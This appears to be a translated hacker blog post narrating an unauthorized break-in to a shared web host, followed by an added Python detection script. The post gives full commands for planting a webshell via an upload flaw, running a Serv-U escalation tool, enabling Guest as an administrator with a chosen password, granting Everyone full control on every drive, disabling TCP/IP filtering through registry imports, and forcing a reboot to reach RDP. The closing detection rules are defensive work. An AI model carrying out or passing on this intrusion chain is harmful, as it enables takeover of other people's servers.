Lvhuana
1: Get a WebShell
A little test this evening. Since I'm such a noob I can't do much; this is all I can manage..........
Everything went through and there's nothing to add, so I hope this little post is understandable.
Today was a boring day, but I wasn't bored at night: I went to a video chat site to watch a show, hehe~
Suddenly found a really hot chat room, already at 500 people (full); I refreshed N times and still couldn't get in.......... So depressing! ()
Thinking it over, there was nothing else to do, so why not test the host's security, huh huh (such a noob; calling it "security" is really flattering myself).
Ping under CMD got the other side's IP, then I logged in to
http://whois.Webhosting.info/ and looked up the other sites on that IP. Ha, this is new: there are dozens of sites, so I figured I'd find one with a hole or two.
After a long search I finally found a page with a usable vulnerability:
http://www.xxxx.net/upfile_soft.asp. First upload a WebShell (Haoyang 2005 official version) (I won't go into how to upload it; upload tools are everywhere these days).
2: Successfully escalated privileges and created a user
After getting the WebShell I was overjoyed, then suddenly found I had no permissions at all: only inside the directory where the shell itself sits (the C, D, E and F disks couldn't be browsed), not even permission to delete a file. Depressing... .....
Went back to 〖Server〗 to see what services the host had running and found Terminal Services and Serv-U. Ha, this is promising ^_^. Scanned his IP with SuperScan and the banner really did show Serv-U, version 5.0.
Went to 〖wscript.shell〗 to try running CMD commands. If that hadn't worked there would be nothing to do, but CMD commands can be run through wscript.shell: I entered NET USER and it returned the other side's user list, haha, great, I can get this!!
Uploaded the Serv-U privilege escalation tool to the D:\A004\TGGTWE\****.com\uploadsoft directory, renamed it test.exe, then went back to 〖wscript.shell〗 to run commands. Hehe, this fat chicken is about to be mine, happy~
Execute CMD commands via wscript.shell:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest /active:yes"   # Activate the Guest account; I like this account
D:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest Lvhuana"   # Set the Guest account's password to Lvhuana
D:\a004\tggtwe\****.com\uploadsoft\test.exe "net localgroup administrators guest /add"   # Promote Guest to Administrator privileges
OK, the account is created; net localgroup administrators shows it went through. Then running netstat -an shows that the terminal port he has open is the default 3389. OK, let's try connecting~
3: Solving TCP/IP filtering
Can't connect!? Dizzy........... I took out SuperScan to scan his 3389 and couldn't see it at all...... (a firewall is on!? Damn, my poor back.. ...)
No way around it; back to WScript.shell again to run CMD commands:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe C: /E /T /G Everyone:F"   # Set the C disk so Everyone can view it
D:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe D: /E /T /G Everyone:F"   # Set the D disk so Everyone can view it
D:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe E: /E /T /G Everyone:F"   # Set the E disk so Everyone can view it
D:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe F: /E /T /G Everyone:F"   # Set the F disk so Everyone can view it
At this point you can at least traverse the entire hard drive. I poked around the whole disk and didn't find any firewall file anywhere, so I was fairly sure: it's definitely TCP/IP filtering! (Of course it could also be an internal network; you can judge that from ipconfig /all.)
To break through TCP/IP filtering we can change his registry. What we have to do is export three of his registry keys, modify them, then import them back. Return to 〖wscript.shell〗 and run the CMD commands:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"   # Export the first registry location that holds TCP/IP filtering
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"   # Export the second registry location that holds TCP/IP filtering
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"   # Export the third registry location that holds TCP/IP filtering
Then go back to 〖stream〗 or 〖fso〗 and there are 1.reg, 2.reg and 3.reg, sitting there quietly, heh~
Download 1.reg, 2.reg and 3.reg to your own hard drive and change the TCP/IP filtering: first open 1.reg, find "EnableSecurityFilters"=dword:00000001 and change the trailing 1 to 0, then change 2.reg and 3.reg the same way; I won't go on about it~ Then upload 1.reg, 2.reg and 3.reg back into the other side's machine (choose overwrite mode here, because we have no permission to delete the original 1.reg, 2.reg and 3.reg), and once the upload succeeds go back to 〖wscript.shell〗:
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\1.reg"   # Import 1.reg into his registry in silent mode
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\2.reg"   # Import 2.reg into his registry in silent mode
D:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -s d:\a004\tggtwe\****.com\uploadsoft\3.reg"   # Import 3.reg into his registry in silent mode
OK! Once they are imported into his machine the TCP/IP filtering problem is solved; then run one more cmd command in WScript.Shell:
D:\a004\tggtwe\****.com\upload\test.exe "iisreset /reboot /timeout:00"   # Use his own IIS service to restart his machine; the /timeout:00 parameter makes it restart immediately
After running it we can't scan him any more. Hey~ it's rebooting!
4: Successful terminal login
After a long wait (actually not that long, I just couldn't bear waiting, hehe~), I could finally scan him with SuperScan again and see his 3389 port. Haha, finally succeeded: with the terminal client I logged in smoothly using the User: Guest, Pass: Lvhuana created earlier!
OK, this rubbish article is over, and so is the takeover~ Since I'm such a noob, mistakes are inevitable; laugh all you like, and I hope everyone will correct me!
(If you repost, please keep the author information; it isn't easy to write something this long...........)
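Every step of the chain above runs as a child of the web server and leaves a distinctive command line, which is exactly what host logging should catch. As an added example (not part of the original post), here is a Python triage over constructed process-creation records that mirror the commands of sections 2 and 3, plus a check for the EnableSecurityFilters change the edited .reg files carry. The IIS parent process names, the sample records and the registry fragment are assumptions.

```python
import re
# Constructed process-creation records (parent image, child image, command line),
# shaped like Sysmon Event ID 1 / Windows 4688 fields, not real logs; the command
# lines mirror what the post runs through the webshell. The IIS parent names below
# are an assumption about the victim host.
SAMPLE_EVENTS = [
    ("w3wp.exe", "cmd.exe", "cmd.exe /c net user"),
    ("w3wp.exe", "test.exe", 'test.exe "net user guest /active:yes"'),
    ("w3wp.exe", "test.exe", 'test.exe "net user guest Lvhuana"'),
    ("w3wp.exe", "test.exe", 'test.exe "net localgroup administrators guest /add"'),
    ("w3wp.exe", "test.exe", 'test.exe "cacls.exe C: /E /T /G Everyone:F"'),
    ("w3wp.exe", "test.exe", 'test.exe "regedit -s D:\\site\\uploadsoft\\1.reg"'),
    ("w3wp.exe", "test.exe", 'test.exe "iisreset /reboot /timeout:00"'),
    ("explorer.exe", "cmd.exe", "cmd.exe /c dir"),
]
WEB_PARENTS = {"w3wp.exe", "inetinfo.exe", "dllhost.exe"}
# One rule per stage of the chain, matched case-insensitively.
RULES = [
    ("guest_enabled",      r"\bnet1?\s+user\s+guest\s+.*?/active:\s*yes"),
    ("guest_password_set", r"\bnet1?\s+user\s+guest\s+(?!/)\S+"),
    ("guest_to_admins",    r"\bnet1?\s+localgroup\s+administrators\s+guest\s+/add"),
    ("acl_everyone_full",  r"\bcacls(\.exe)?\s+[a-z]:\\?\s.*?/g\s+everyone:f"),
    ("silent_reg_import",  r"\bregedit(\.exe)?\s+[/-]s\b"),
    ("iis_forced_reboot",  r"\biisreset(\.exe)?\s.*?/reboot"),
]

def triage(events):
    """(rule, severity, command line) for every matching record. A hit whose parent
    is a web server worker is escalated: a site has no business touching local
    accounts, drive ACLs or the registry."""
    findings = []
    for parent, _image, cmdline in events:
        for name, pattern in RULES:
            if re.search(pattern, cmdline, re.IGNORECASE):
                sev = "critical" if parent.lower() in WEB_PARENTS else "high"
                findings.append((name, sev, cmdline))
    return findings

def chain_stages(findings):
    """Distinct stages observed; the post's chain trips all six."""
    return {name for name, _, _ in findings}

# Constructed fragment of a registry export like the 1.reg the post edits.
SAMPLE_REG = ('[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters]\n'
              '"EnableSecurityFilters"=dword:00000000\n')
def security_filters_disabled(reg_text):
    """True if the export sets Tcpip EnableSecurityFilters to 0 (filtering off)."""
    m = re.search(r'"EnableSecurityFilters"=dword:([0-9a-f]{8})', reg_text, re.IGNORECASE)
    return m is not None and int(m.group(1), 16) == 0
```

On a real host the same rules would run over command-line auditing output; the Guest password change and the Everyone:F grants on every drive are the two findings that should page someone even without the web-server parent.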